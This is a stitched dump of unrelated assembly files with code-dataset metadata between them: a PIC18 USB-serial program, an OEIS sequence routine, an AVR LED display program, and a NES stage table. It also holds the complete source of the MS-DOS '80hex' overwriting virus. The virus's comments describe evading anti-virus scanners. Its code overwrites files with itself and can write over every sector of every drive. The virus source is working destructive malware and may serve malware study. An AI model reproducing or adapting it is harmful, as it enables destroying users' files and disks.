MOVWF CompTempVarRet2823+D'1', 1
RETURN
; } FCD_056e1_v5__usbserial0__ReadByte function end
ORG 0x000010AC
FCD_056e1__000A4
; { FCD_056e1_v5__usbserial0__SendString ; function begin
CLRF FCD_056e1__000A4_1_FCL_TIMEOUT, 1
CLRF FCD_056e1__000A4_1_FCL_TIMEOUT+D'1', 1
MOVF FCD_056e1__000A4_arg_FCL_DATA, W, 1
MOVWF FCI_GETLEN_0003D_arg_sStr1, 1
MOVF FCD_056e1__000A4_arg_FCL_DATA+D'1', W, 1
MOVWF FCI_GETLEN_0003D_arg_sStr1+D'1', 1
MOVF FCD_056e1__000A4_arg_FCLsz_DATA, W, 1
MOVWF FCI_GETLEN_0003D_arg_iStr1_len, 1
CALL FCI_GETLEN_0003D
MOVF CompTempVarRet1856, W, 1
MOVWF FCD_056e1__000A4_1_FCL_LENGTH, 1
label152
CALL usb_cdc_tx_0009F
MOVF CompTempVarRet2799, F, 1
BNZ label154
MOVLW 0x7D
SUBWF FCD_056e1__000A4_1_FCL_TIMEOUT+D'1', W, 1
BNZ label153
MOVLW 0x00
SUBWF FCD_056e1__000A4_1_FCL_TIMEOUT, W, 1
label153
BC label154
MOVF FCD_056e1__000A4_1_FCL_TIMEOUT, F, 1
MOVF FCD_056e1__000A4_1_FCL_TIMEOUT+D'1', F, 1
INCF FCD_056e1__000A4_1_FCL_TIMEOUT, F, 1
BTFSC STATUS,Z
INCF FCD_056e1__000A4_1_FCL_TIMEOUT+D'1', F, 1
BRA label152
label154
MOVLW 0x00
CPFSEQ FCD_056e1__000A4_1_FCL_TIMEOUT, 1
BRA label155
MOVLW 0x7D
CPFSEQ FCD_056e1__000A4_1_FCL_TIMEOUT+D'1', 1
BRA label155
MOVLW 0x01
MOVWF CompTempVarRet2812, 1
RETURN
label155
CLRF FCD_056e1__000A4_1_n, 1
label156
MOVF FCD_056e1__000A4_arg_FCL_DATA+D'1', W, 1
MOVWF FSR0H
MOVF FCD_056e1__000A4_arg_FCL_DATA, W, 1
ADDWF FCD_056e1__000A4_1_n, W, 1
MOVWF FSR0L
MOVF INDF0, F
BZ label157
MOVF FCD_056e1__000A4_1_FCL_LENGTH, W, 1
CPFSLT FCD_056e1__000A4_1_n, 1
BRA label157
MOVF FCD_056e1__000A4_arg_FCL_DATA+D'1', W, 1
MOVWF FSR0H
MOVF FCD_056e1__000A4_arg_FCL_DATA, W, 1
ADDWF FCD_056e1__000A4_1_n, W, 1
MOVWF FSR0L
MOVF INDF0, W
MOVWF usb_cdc_pu_0009D_arg_c, 1
CALL usb_cdc_pu_0009D
INCF FCD_056e1__000A4_1_n, F, 1
BRA label156
label157
CLRF FCD_056e1__000A4_1_FCR_RETVAL, 1
MOVF FCD_056e1__000A4_1_FCR_RETVAL, W, 1
MOVWF CompTempVarRet2812, 1
RETURN
; } FCD_056e1_v5__usbserial0__SendString function end
ORG 0x0000112A
main
; { main ; function begin
CLRF gbl_ansel
CLRF gbl_anselh
CALL FCD_0df41__00057
CALL FCD_056e1__000AD
label158
MOVLW 0x0A
MOVWF FCD_056e1__000AA_arg_FCL_T_000AB, 1
CALL FCD_056e1__000AA
MOVF CompTempVarRet2823, W, 1
MOVWF gbl_FCV_OPERATION, 1
MOVLW 0x31
CPFSEQ gbl_FCV_OPERATION, 1
BRA label159
BRA label160
label159
MOVLW 0x32
CPFSEQ gbl_FCV_OPERATION, 1
BRA label158
BRA label161
label160
CALL FCD_08f41__0007B
MOVF CompTempVarRet2708, W, 1
MOVWF gbl_FCV_READINPUT, 1
MOVF CompTempVarRet2708+D'1', W, 1
MOVWF gbl_FCV_READINPUT+D'1', 1
MOVF gbl_FCV_READINPUT, F, 1
MOVF gbl_FCV_READINPUT+D'1', W, 1
MOVWF CompTempVar2830, 1
BCF STATUS,C
RLCF gbl_FCV_READINPUT, F, 1
RLCF CompTempVar2830, F, 1
MOVLW 0x01
IORWF gbl_FCV_READINPUT, F, 1
MOVF CompTempVar2830, W, 1
IORLW 0x10
MOVWF CompTempVar2828, 1
MOVF CompTempVar2828, W, 1
MOVWF gbl_FCV_READINPUT+D'1', 1
MOVF gbl_FCV_READINPUT, W, 1
MOVWF gbl_FCV_OUTSTRING, 1
MOVF gbl_FCV_READINPUT+D'1', W, 1
MOVWF gbl_FCV_OUTSTRING+D'1', 1
MOVLW HIGH(gbl_FCV_OUTSTRING+D'0')
MOVWF FCD_056e1__000A4_arg_FCL_DATA+D'1', 1
MOVLW LOW(gbl_FCV_OUTSTRING+D'0')
MOVWF FCD_056e1__000A4_arg_FCL_DATA, 1
MOVLW 0x02
MOVWF FCD_056e1__000A4_arg_FCLsz_DATA, 1
CLRF FCD_056e1__000A4_arg_FCLsz_DATA+D'1', 1
CALL FCD_056e1__000A4
BRA label158
label161
CALL FCD_08f42__0006A
MOVF CompTempVarRet2684, W, 1
MOVWF gbl_FCV_READINPUT, 1
MOVF CompTempVarRet2684+D'1', W, 1
MOVWF gbl_FCV_READINPUT+D'1', 1
MOVF gbl_FCV_READINPUT, F, 1
MOVF gbl_FCV_READINPUT+D'1', W, 1
MOVWF CompTempVar2838, 1
BCF STATUS,C
RLCF gbl_FCV_READINPUT, F, 1
RLCF CompTempVar2838, F, 1
MOVLW 0x01
IORWF gbl_FCV_READINPUT, F, 1
MOVF CompTempVar2838, W, 1
IORLW 0x10
MOVWF CompTempVar2836, 1
MOVF CompTempVar2836, W, 1
MOVWF gbl_FCV_READINPUT+D'1', 1
MOVF gbl_FCV_READINPUT, W, 1
MOVWF gbl_FCV_OUTSTRING, 1
MOVF gbl_FCV_READINPUT+D'1', W, 1
MOVWF gbl_FCV_OUTSTRING+D'1', 1
MOVLW HIGH(gbl_FCV_OUTSTRING+D'0')
MOVWF FCD_056e1__000A4_arg_FCL_DATA+D'1', 1
MOVLW LOW(gbl_FCV_OUTSTRING+D'0')
MOVWF FCD_056e1__000A4_arg_FCL_DATA, 1
MOVLW 0x02
MOVWF FCD_056e1__000A4_arg_FCLsz_DATA, 1
CLRF FCD_056e1__000A4_arg_FCLsz_DATA+D'1', 1
CALL FCD_056e1__000A4
BRA label158
; } main function end
ORG 0x000011D6
_startup
MOVLW 0xD5
MOVLB 0x00
MOVWF gbl_14_LSR, 1
MOVLW 0xC4
MOVWF gbl_14_LSR+D'1', 1
MOVLW 0xBB
MOVWF gbl_14_LSR+D'2', 1
MOVLW 0xDC
MOVWF gbl_14_LSR+D'3', 1
MOVLB 0x01
CLRF gbl_15_gbl_aSig, 1
CLRF gbl_15_gbl_aSig+D'1', 1
CLRF gbl_15_gbl_aSig+D'2', 1
CLRF gbl_15_gbl_aSig+D'3', 1
CLRF gbl_15_gbl_bSig, 1
CLRF gbl_15_gbl_bSig+D'1', 1
CLRF gbl_15_gbl_bSig+D'2', 1
CLRF gbl_15_gbl_bSig+D'3', 1
CLRF gbl_15_gbl_zSig, 1
CLRF gbl_15_gbl_zSig+D'1', 1
CLRF gbl_15_gbl_zSig+D'2', 1
CLRF gbl_15_gbl_zSig+D'3', 1
MOVLB 0x02
CLRF gbl_15_gbl_aExp, 1
CLRF gbl_15_gbl_bExp, 1
MOVLB 0x01
CLRF gbl_15_gbl_zExp, 1
CLRF gbl_15_gbl_zExp+D'1', 1
MOVLB 0x02
CLRF gbl_15_gbl_aSign, 1
CLRF gbl_15_gbl_bSign, 1
CLRF gbl_15_gbl_zSign, 1
CLRF gbl_15_gbl_zSigZero, 1
MOVLB 0x01
CLRF gbl_15_gbl_ret, 1
CLRF gbl_15_gbl_ret+D'1', 1
CLRF gbl_15_gbl_ret+D'2', 1
CLRF gbl_15_gbl_ret+D'3', 1
MOVLB 0x02
CLRF gbl_float_rounding_mode, 1
CLRF gbl_float_exception_flags, 1
CLRF gbl_float_detect_tininess
BCF CompGblVar65,0, 1
BCF CompGblVar66,1, 1
BCF CompGblVar65,0, 1
BCF CompGblVar66,1, 1
CLRF gbl_FCV_0df41_PWM1__ENABLED, 1
MOVLW 0x28
MOVLB 0x01
MOVWF gbl_MX_USBNAME, 1
MOVLW 0x03
MOVWF gbl_MX_USBNAME+D'1', 1
MOVLW 0x46
MOVWF gbl_MX_USBNAME+D'2', 1
CLRF gbl_MX_USBNAME+D'3', 1
MOVLW 0x6C
MOVWF gbl_MX_USBNAME+D'4', 1
CLRF gbl_MX_USBNAME+D'5', 1
MOVLW 0x6F
MOVWF gbl_MX_USBNAME+D'6', 1
CLRF gbl_MX_USBNAME+D'7', 1
MOVLW 0x77
MOVWF gbl_MX_USBNAME+D'8', 1
CLRF gbl_MX_USBNAME+D'9', 1
MOVLW 0x63
MOVWF gbl_MX_USBNAME+D'10', 1
CLRF gbl_MX_USBNAME+D'11', 1
MOVLW 0x6F
MOVWF gbl_MX_USBNAME+D'12', 1
CLRF gbl_MX_USBNAME+D'13', 1
MOVLW 0x64
MOVWF gbl_MX_USBNAME+D'14', 1
CLRF gbl_MX_USBNAME+D'15', 1
MOVLW 0x65
MOVWF gbl_MX_USBNAME+D'16', 1
CLRF gbl_MX_USBNAME+D'17', 1
MOVLW 0x20
MOVWF gbl_MX_USBNAME+D'18', 1
CLRF gbl_MX_USBNAME+D'19', 1
MOVLW 0x55
MOVWF gbl_MX_USBNAME+D'20', 1
CLRF gbl_MX_USBNAME+D'21', 1
MOVLW 0x53
MOVWF gbl_MX_USBNAME+D'22', 1
CLRF gbl_MX_USBNAME+D'23', 1
MOVLW 0x42
MOVWF gbl_MX_USBNAME+D'24', 1
CLRF gbl_MX_USBNAME+D'25', 1
MOVLW 0x20
MOVWF gbl_MX_USBNAME+D'26', 1
CLRF gbl_MX_USBNAME+D'27', 1
MOVLW 0x53
MOVWF gbl_MX_USBNAME+D'28', 1
CLRF gbl_MX_USBNAME+D'29', 1
MOVLW 0x65
MOVWF gbl_MX_USBNAME+D'30', 1
CLRF gbl_MX_USBNAME+D'31', 1
MOVLW 0x72
MOVWF gbl_MX_USBNAME+D'32', 1
CLRF gbl_MX_USBNAME+D'33', 1
MOVLW 0x69
MOVWF gbl_MX_USBNAME+D'34', 1
CLRF gbl_MX_USBNAME+D'35', 1
MOVLW 0x61
MOVWF gbl_MX_USBNAME+D'36', 1
CLRF gbl_MX_USBNAME+D'37', 1
MOVLW 0x6C
MOVWF gbl_MX_USBNAME+D'38', 1
CLRF gbl_MX_USBNAME+D'39', 1
MOVLW 0x2E
MOVWF gbl_MX_USBMFR, 1
MOVLW 0x03
MOVWF gbl_MX_USBMFR+D'1', 1
MOVLW 0x4D
MOVWF gbl_MX_USBMFR+D'2', 1
CLRF gbl_MX_USBMFR+D'3', 1
MOVLW 0x61
MOVWF gbl_MX_USBMFR+D'4', 1
CLRF gbl_MX_USBMFR+D'5', 1
MOVLW 0x74
MOVWF gbl_MX_USBMFR+D'6', 1
CLRF gbl_MX_USBMFR+D'7', 1
MOVLW 0x72
MOVWF gbl_MX_USBMFR+D'8', 1
CLRF gbl_MX_USBMFR+D'9', 1
MOVLW 0x69
MOVWF gbl_MX_USBMFR+D'10', 1
CLRF gbl_MX_USBMFR+D'11', 1
MOVLW 0x78
MOVWF gbl_MX_USBMFR+D'12', 1
CLRF gbl_MX_USBMFR+D'13', 1
MOVLW 0x20
MOVWF gbl_MX_USBMFR+D'14', 1
CLRF gbl_MX_USBMFR+D'15', 1
MOVLW 0x4D
MOVWF gbl_MX_USBMFR+D'16', 1
CLRF gbl_MX_USBMFR+D'17', 1
MOVLW 0x75
MOVWF gbl_MX_USBMFR+D'18', 1
CLRF gbl_MX_USBMFR+D'19', 1
MOVLW 0x6C
MOVWF gbl_MX_USBMFR+D'20', 1
CLRF gbl_MX_USBMFR+D'21', 1
MOVLW 0x74
MOVWF gbl_MX_USBMFR+D'22', 1
CLRF gbl_MX_USBMFR+D'23', 1
MOVLW 0x69
MOVWF gbl_MX_USBMFR+D'24', 1
CLRF gbl_MX_USBMFR+D'25', 1
MOVLW 0x6D
MOVWF gbl_MX_USBMFR+D'26', 1
CLRF gbl_MX_USBMFR+D'27', 1
MOVLW 0x65
MOVWF gbl_MX_USBMFR+D'28', 1
CLRF gbl_MX_USBMFR+D'29', 1
MOVLW 0x64
MOVWF gbl_MX_USBMFR+D'30', 1
CLRF gbl_MX_USBMFR+D'31', 1
MOVLW 0x69
MOVWF gbl_MX_USBMFR+D'32', 1
CLRF gbl_MX_USBMFR+D'33', 1
MOVLW 0x61
MOVWF gbl_MX_USBMFR+D'34', 1
CLRF gbl_MX_USBMFR+D'35', 1
MOVLW 0x20
MOVWF gbl_MX_USBMFR+D'36', 1
CLRF gbl_MX_USBMFR+D'37', 1
MOVLW 0x4C
MOVWF gbl_MX_USBMFR+D'38', 1
CLRF gbl_MX_USBMFR+D'39', 1
MOVLW 0x74
MOVWF gbl_MX_USBMFR+D'40', 1
CLRF gbl_MX_USBMFR+D'41', 1
MOVLW 0x64
MOVWF gbl_MX_USBMFR+D'42', 1
CLRF gbl_MX_USBMFR+D'43', 1
MOVLW 0x2E
MOVWF gbl_MX_USBMFR+D'44', 1
CLRF gbl_MX_USBMFR+D'45', 1
MOVLW 0x0A
MOVLB 0x00
MOVWF gbl_MX_SERIAL, 1
MOVLW 0x03
MOVWF gbl_MX_SERIAL+D'1', 1
MOVLW 0x30
MOVWF gbl_MX_SERIAL+D'2', 1
CLRF gbl_MX_SERIAL+D'3', 1
MOVLW 0x30
MOVWF gbl_MX_SERIAL+D'4', 1
CLRF gbl_MX_SERIAL+D'5', 1
MOVLW 0x30
MOVWF gbl_MX_SERIAL+D'6', 1
CLRF gbl_MX_SERIAL+D'7', 1
MOVLW 0x31
MOVWF gbl_MX_SERIAL+D'8', 1
CLRF gbl_MX_SERIAL+D'9', 1
MOVLW HIGH(gbl_buffer_0_in+D'0')
MOVLB 0x02
MOVWF CompGblVar60, 1
MOVLW LOW(gbl_buffer_0_in+D'0')
MOVLB 0x01
MOVWF gbl_ep_in_buffer_location, 1
MOVLB 0x02
MOVF CompGblVar60, W, 1
MOVLB 0x01
MOVWF gbl_ep_in_buffer_location+D'1', 1
CLRF gbl_ep_in_buffer_location+D'2', 1
CLRF gbl_ep_in_buffer_location+D'3', 1
MOVLW HIGH(gbl_buffer_2_in+D'0')
MOVLB 0x02
MOVWF CompGblVar61, 1
MOVLW LOW(gbl_buffer_2_in+D'0')
MOVLB 0x01
MOVWF gbl_ep_in_buffer_location+D'4', 1
MOVLB 0x02
MOVF CompGblVar61, W, 1
MOVLB 0x01
MOVWF gbl_ep_in_buffer_location+D'5', 1
MOVLW HIGH(gbl_buffer_3_in+D'0')
MOVLB 0x02
MOVWF CompGblVar62, 1
MOVLW LOW(gbl_buffer_3_in+D'0')
MOVLB 0x01
MOVWF gbl_ep_in_buffer_location+D'6', 1
MOVLB 0x02
MOVF CompGblVar62, W, 1
MOVLB 0x01
MOVWF gbl_ep_in_buffer_location+D'7', 1
MOVLW HIGH(gbl_buffer_0_out+D'0')
MOVLB 0x02
MOVWF CompGblVar63, 1
MOVLW LOW(gbl_buffer_0_out+D'0')
MOVLB 0x01
MOVWF gbl_ep_out_buffer_location, 1
MOVLB 0x02
MOVF CompGblVar63, W, 1
MOVLB 0x01
MOVWF gbl_ep_out_buffer_location+D'1', 1
CLRF gbl_ep_out_buffer_location+D'2', 1
CLRF gbl_ep_out_buffer_location+D'3', 1
CLRF gbl_ep_out_buffer_location+D'4', 1
CLRF gbl_ep_out_buffer_location+D'5', 1
MOVLW HIGH(gbl_buffer_3_out+D'0')
MOVLB 0x02
MOVWF CompGblVar64, 1
MOVLW LOW(gbl_buffer_3_out+D'0')
MOVLB 0x01
MOVWF gbl_ep_out_buffer_location+D'6', 1
MOVLB 0x02
MOVF CompGblVar64, W, 1
MOVLB 0x01
MOVWF gbl_ep_out_buffer_location+D'7', 1
MOVLW 0x08
MOVWF gbl_ep_in_buffer_size, 1
CLRF gbl_ep_in_buffer_size+D'1', 1
CLRF gbl_ep_in_buffer_size+D'2', 1
CLRF gbl_ep_in_buffer_size+D'3', 1
MOVLW 0x08
MOVWF gbl_ep_in_buffer_size+D'4', 1
CLRF gbl_ep_in_buffer_size+D'5', 1
MOVLW 0x08
MOVWF gbl_ep_in_buffer_size+D'6', 1
CLRF gbl_ep_in_buffer_size+D'7', 1
MOVLW 0x08
MOVWF gbl_ep_out_buffer_size, 1
CLRF gbl_ep_out_buffer_size+D'1', 1
CLRF gbl_ep_out_buffer_size+D'2', 1
CLRF gbl_ep_out_buffer_size+D'3', 1
CLRF gbl_ep_out_buffer_size+D'4', 1
CLRF gbl_ep_out_buffer_size+D'5', 1
MOVLW 0x08
MOVWF gbl_ep_out_buffer_size+D'6', 1
CLRF gbl_ep_out_buffer_size+D'7', 1
MOVLB 0x02
CLRF gbl_usb_state, 1
CLRF gbl_cdc_tx_start, 1
CLRF gbl_cdc_tx_end, 1
CLRF gbl_cdc_rx_start, 1
CLRF gbl_cdc_rx_end, 1
MOVLW 0x04
MOVWF gbl_string_00, 1
MOVLW 0x03
MOVWF gbl_string_00+D'1', 1
MOVLW 0x09
MOVWF gbl_string_00+D'2', 1
MOVLW 0x04
MOVWF gbl_string_00+D'3', 1
CLRF gbl_CDC_USB_status, 1
GOTO main
ORG 0x0000141A
interrupt
; { interrupt ; function begin
MOVFF FSR0H, Int1Context
MOVFF FSR0L, Int1Context+D'1'
MOVFF PRODH, Int1Context+D'2'
MOVFF PRODL, Int1Context+D'3'
MOVLW 0x99
GOTO usb_handle_0007E
label163
MOVFF Int1Context+D'3', PRODL
MOVFF Int1Context+D'2', PRODH
MOVFF Int1Context+D'1', FSR0L
MOVFF Int1Context, FSR0H
RETFIE 1
; } interrupt function end
ORG 0x00300000
DW 0x3238
DW 0x1E1F
DW 0x8808
DW 0xC003
DW 0xE003
DW 0xFFFF
DW 0xFFFF
END
| 27.965892
| 82
| 0.743824
|
cf579b138d29b8ed6c6ff5318fc8d04611bf58b4
| 2,425
|
asm
|
Assembly
|
MSDOS/Virus.MSDOS.Unknown.80hex.asm
|
fengjixuchui/Family
|
2abe167082817d70ff2fd6567104ce4bcf0fe304
|
[
"MIT"
] | 3
|
2021-05-15T15:57:13.000Z
|
2022-03-16T09:11:05.000Z
|
MSDOS/Virus.MSDOS.Unknown.80hex.asm
|
fengjixuchui/Family
|
2abe167082817d70ff2fd6567104ce4bcf0fe304
|
[
"MIT"
] | null | null | null |
MSDOS/Virus.MSDOS.Unknown.80hex.asm
|
fengjixuchui/Family
|
2abe167082817d70ff2fd6567104ce4bcf0fe304
|
[
"MIT"
] | 3
|
2021-05-15T15:57:15.000Z
|
2022-01-08T20:51:04.000Z
|
; ------------------------------------------------------------------------------
; - 80hex virus -
; (c) 1994 The Unforgiven/Immortal Riot
; Pay-Load function:
; This will be dropped to the file c:\dos\keyb.com, that often
; is called from autoexec.bat, which will result in that all files
; in DOS being overwritten. Eventually all hds will be trashed as well.
; General-information:
; It's a simple overwriting virus, BUT not released 'alone' as
; the purpose as a virus that will infect systems and travel
; around the world. It's rather an original pay-load, outsmarted
; by my creative/destructive brain.
; It's not encrypted, still *NO* anti-virus detects it, this is probably
; due to its simplistic shape. It's *highly* destructive, and is really
; more or less a trojan. But it can replicate, so...
; Greetings to all destructive virus writers!
; - The Unforgiven/Immortal Riot
;Riot.trivial.80h
.model tiny
.code
org 100h
start:
dec byte ptr offset files ; tricking tbscan !
add ah,4eh ; tricking f-prot !
mov dx, offset files
next: int 21h
jnc open
mov ah,2ch ; Value of 1/100 of a second
int 21h
cmp dl,79 ; 20%
jb quit ;
mov al,2h
drive: ; Harddrive, seek and destroy!
mov cx,1
lea bx,virus
cwd ; clear dx (ax = <8000h)
Next_Sector:
int 26h
inc dx
jnc next_sector ; all sectors
inc al
jmp short drive ; all drives
quit:
ret
open:
inc byte ptr offset files
add ax,3d02h
mov dx, offset 9eh
int 21h
write:
xchg ax,bx
mov ah,40h
mov dx, offset start
mov cx, endoffile - start
int 21h
close:
sub ah,2
int 21h
mov ah,4fh
jmp short next
data:
files db "+.*",0 ; => *.*
virus db "Materialism - the religion of today, "
truth db "ain't it sad?"
endoffile:
end start
| 27.556818
| 80
| 0.480825
|
611dc038b8700cf112fbe287f06e48016e724da1
| 340
|
asm
|
Assembly
|
programs/oeis/229/A229481.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 22
|
2018-02-06T19:19:31.000Z
|
2022-01-17T21:53:31.000Z
|
programs/oeis/229/A229481.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 41
|
2021-02-22T19:00:34.000Z
|
2021-08-28T10:47:47.000Z
|
programs/oeis/229/A229481.asm
|
neoneye/loda
|
afe9559fb53ee12e3040da54bd6aa47283e0d9ec
|
[
"Apache-2.0"
] | 5
|
2021-02-24T21:14:16.000Z
|
2021-08-09T19:48:05.000Z
|
; A229481: Final digit of 1^n + 2^n + ... + n^n.
; 0,1,5,6,4,5,1,4,2,5,5,6,0,1,5,0,8,3,9,0,6,1,5,6,0,5,1,4,8,5,5,6,6,1,5,0,4,3,9,0,2,1,5,6,6,5,1,4,4,5,5,6,2,1,5,0,0,3,9,0,8,1,5,6,2,5,1,4,0,5,5,6,8,1,5,0,6,3,9,0,4,1,5,6,8,5,1,4,6,5,5,6,4,1,5,0,2,3,9,0
mov $2,$0
lpb $0
mov $3,$0
sub $0,1
pow $3,$2
add $1,$3
lpe
mod $1,10
mov $0,$1
| 26.153846
| 201
| 0.494118
|
cf2efd4e585b5236640e12510fba22a0bc3fb3bb
| 4,837
|
asm
|
Assembly
|
Assembler/Mehanicheskaya razvertka_ATmega8535/meh_raz.asm
|
edosedgar/avr_8bit
|
b582f976cc51417d2d01e28015df06f0a62d87ef
|
[
"Apache-2.0"
] | null | null | null |
Assembler/Mehanicheskaya razvertka_ATmega8535/meh_raz.asm
|
edosedgar/avr_8bit
|
b582f976cc51417d2d01e28015df06f0a62d87ef
|
[
"Apache-2.0"
] | null | null | null |
Assembler/Mehanicheskaya razvertka_ATmega8535/meh_raz.asm
|
edosedgar/avr_8bit
|
b582f976cc51417d2d01e28015df06f0a62d87ef
|
[
"Apache-2.0"
] | null | null | null |
.include "m8535def.inc"
.macro Outi
ldi temp,@1
out @0,temp
.endm
.def temp=R16
.def counter=R21
.def buffer=r20
.equ blue=portd
.equ red=portb
.equ green=portc
.cseg
.org 0
rjmp RESET ; Reset Handler
reti;rjmp EXT_INT0 ; IRQ0 Handler
reti;rjmp EXT_INT1 ; IRQ1 Handler
reti;rjmp TIM2_COMP ; Timer2 Compare Handler
reti;rjmp TIM2_OVF ; Timer2 Overflow Handler
reti;rjmp TIM1_CAPT ; Timer1 Capture Handler
reti;rjmp TIM1_COMPA ; Timer1 Compare A Handler
reti;rjmp TIM1_COMPB ; Timer1 Compare B Handler
reti;rjmp TIM1_OVF ; Timer1 Overflow Handler
reti;rjmp TIM0_OVF ; Timer0 Overflow Handler
reti;rjmp SPI_STC ; SPI Transfer Complete Handler
reti;rjmp USART_RXC ; USART RX Complete Handler
reti;rjmp USART_UDRE ; UDR Empty Handler
reti;rjmp USART_TXC ; USART TX Complete Handler
reti;rjmp ADC_ ; ADC Conversion Complete Handler
reti;rjmp EE_RDY ; EEPROM Ready Handler
reti;rjmp ANA_COMP ; Analog Comparator Handler
reti;rjmp TWSI ; Two-wire Serial Interface Handler
reti;rjmp EXT_INT2 ; IRQ2 Handler
reti;rjmp TIM0_COMP ; Timer0 Compare Handler
reti;rjmp SPM_RDY ;0b11101000
RESET: ; Reset Handler
init:
outi SPL,low(RAMEND)
outi SPH,high(RAMEND)
outi ddrd,255
outi ddrb,255
outi ddrc,255
start:
rcall delay
rcall delay
rcall delay
rcall delay
rcall delay
rcall delay
rcall delay
rcall delay
rcall delay
rcall delay
rcall delay
LDI BUFFER,255
RCALL BLUE_P
LDI BUFFER,145
RCALL BLUE_P
LDI BUFFER,145
RCALL BLUE_P
LDI BUFFER,145
RCALL BLUE_P
LDI BUFFER,255
RCALL BLUE_P
RCALL CLR_P
rcall delay2
rcall delay2
LDI BUFFER,255
OUT BLUE,BUFFER
LDI BUFFER,255
OUT RED,BUFFER
RCALL DELAY2
LDI BUFFER,137
OUT BLUE,BUFFER
LDI BUFFER,137
OUT RED,BUFFER
RCALL DELAY2
LDI BUFFER,137
OUT BLUE,BUFFER
LDI BUFFER,137
OUT RED,BUFFER
RCALL DELAY2
LDI BUFFER,137
OUT BLUE,BUFFER
LDI BUFFER,137
OUT RED,BUFFER
RCALL DELAY2
LDI BUFFER,137
OUT BLUE,BUFFER
LDI BUFFER,137
OUT RED,BUFFER
RCALL DELAY2
rcall clr_p
rcall delay2
rcall delay2
LDI BUFFER,63
RCALL RED_P
LDI BUFFER,72
RCALL RED_P
LDI BUFFER,136
RCALL RED_P
LDI BUFFER,72
RCALL RED_P
LDI BUFFER,63
RCALL RED_P
RCALL CLR_P
rcall delay2
rcall delay2
LDI BUFFER,1
OUT green,BUFFER
LDI BUFFER,192
OUT red,BUFFER
RCALL DELAY2
LDI BUFFER,1
OUT green,BUFFER
LDI BUFFER,128
OUT red,BUFFER
RCALL DELAY2
LDI BUFFER,255
OUT green,BUFFER
LDI BUFFER,255
OUT red,BUFFER
RCALL DELAY2
LDI BUFFER,1
OUT green,BUFFER
LDI BUFFER,128
OUT red,BUFFER
RCALL DELAY2
LDI BUFFER,1
OUT green,BUFFER
LDI BUFFER,192
OUT red,BUFFER
RCALL DELAY2
rcall clr_p
rcall delay2
rcall delay2
LDI BUFFER,255
RCALL GREEN_P
LDI BUFFER,137
RCALL GREEN_P
LDI BUFFER,137
RCALL GREEN_P
LDI BUFFER,137
RCALL GREEN_P
LDI BUFFER,118
RCALL GREEN_P
RCALL CLR_P
rcall delay2
rcall delay2
LDI BUFFER,126
OUT green,BUFFER
LDI BUFFER,126
OUT BLUE,BUFFER
RCALL DELAY2
LDI BUFFER,129
OUT green,BUFFER
LDI BUFFER,129
OUT BLUE,BUFFER
RCALL DELAY2
LDI BUFFER,129
OUT green,BUFFER
LDI BUFFER,129
OUT BLUE,BUFFER
RCALL DELAY2
LDI BUFFER,129
OUT green,BUFFER
LDI BUFFER,129
OUT BLUE,BUFFER
RCALL DELAY2
LDI BUFFER,126
OUT green,BUFFER
LDI BUFFER,126
OUT BLUE,BUFFER
RCALL DELAY2
rcall clr_p
rcall delay2
rcall delay2
LDI BUFFER,129
OUT green,BUFFER
LDI BUFFER,129
OUT RED,BUFFER
OUT BLUE,BUFFER
RCALL DELAY2
LDI BUFFER,66
OUT green,BUFFER
LDI BUFFER,66
OUT RED,BUFFER
OUT BLUE,BUFFER
RCALL DELAY2
LDI BUFFER,60
OUT green,BUFFER
LDI BUFFER,60
OUT RED,BUFFER
OUT BLUE,BUFFER
RCALL DELAY2
LDI BUFFER,66
OUT green,BUFFER
LDI BUFFER,66
OUT RED,BUFFER
OUT BLUE,BUFFER
RCALL DELAY2
LDI BUFFER,129
OUT green,BUFFER
LDI BUFFER,129
OUT RED,BUFFER
OUT BLUE,BUFFER
RCALL DELAY2
rcall clr_p
rcall delay2
rcall delay2
rjmp start
clr_p:
outi red,0
outi green,0
outi blue,0
ret
BLUE_P:
out portd,buffer
rcall delay2
ret
RED_P:
out portb,buffer
rcall delay2
ret
GREEN_P:
; rcall invert_buffer
out portc,buffer
rcall delay2
ret
delay:
ldi R17, $1F
WGLOOP4: ldi R18, $55
WGLOOP5: dec R18
brne WGLOOP5
dec R17
brne WGLOOP4
; -----------------------------
; delaying 2 cycles:
nop
nop
;rcall clr_p
ret
delay2:
ldi R17, $1F
WGLOOP0: ldi R18, $55
WGLOOP1: dec R18
brne WGLOOP1
dec R17
brne WGLOOP0
; -----------------------------
; delaying 2 cycles:
nop
nop
ret
invert_buffer:
ldi r25,8
cycle:
dec r25
std z+1,buffer
cpi r25,0
brne cycle
ret
| 17.399281
| 52
| 0.685756
|
0080ed89202e382d8a60d450ddd4b6142e346ffe
| 1,453
|
asm
|
Assembly
|
game/data/stages/stages-index.asm
|
pompshuffle/super-tilt-bro
|
d0f836290223085d7794c445c696e1c644c674d2
|
[
"WTFPL"
] | 2
|
2020-09-29T16:43:35.000Z
|
2021-08-24T16:41:22.000Z
|
game/data/stages/stages-index.asm
|
pompshuffle/super-tilt-bro
|
d0f836290223085d7794c445c696e1c644c674d2
|
[
"WTFPL"
] | null | null | null |
game/data/stages/stages-index.asm
|
pompshuffle/super-tilt-bro
|
d0f836290223085d7794c445c696e1c644c674d2
|
[
"WTFPL"
] | null | null | null |
stages_init_routine:
RAW_VECTOR(stage_generic_init) ; Plateau
RAW_VECTOR(stage_pit_init) ; Pit
RAW_VECTOR(stage_generic_init) ; Shelf
RAW_VECTOR(stage_gem_init) ; Gem
stages_tick_routine:
RAW_VECTOR(dummy_routine) ; Plateau
RAW_VECTOR(stage_pit_tick) ; Pit
RAW_VECTOR(dummy_routine) ; Shelf
RAW_VECTOR(stage_gem_tick) ; Gem
stages_nametable:
RAW_VECTOR(nametable_flatland) ; Plateau
RAW_VECTOR(nametable_stage_pit) ; Pit
RAW_VECTOR(nametable_stage_shelf) ; Shelf
RAW_VECTOR(nametable_stage_gem) ; Gem
stage_palettes:
RAW_VECTOR(stage_plateau_palette_data) ; Plateau
RAW_VECTOR(stage_pit_palette_data) ; Pit
RAW_VECTOR(stage_shelf_palette_data) ; Shelf
RAW_VECTOR(stage_gem_palette_data) ; Gem
stages_data:
RAW_VECTOR(stage_plateau_data) ; Plateau
RAW_VECTOR(stage_pit_data) ; Pit
RAW_VECTOR(stage_shelf_data) ; Shelf
RAW_VECTOR(stage_gem_data) ; Gem
stages_bank:
.byt STAGE_PLATEAU_BANK_NUMBER ; Plateau
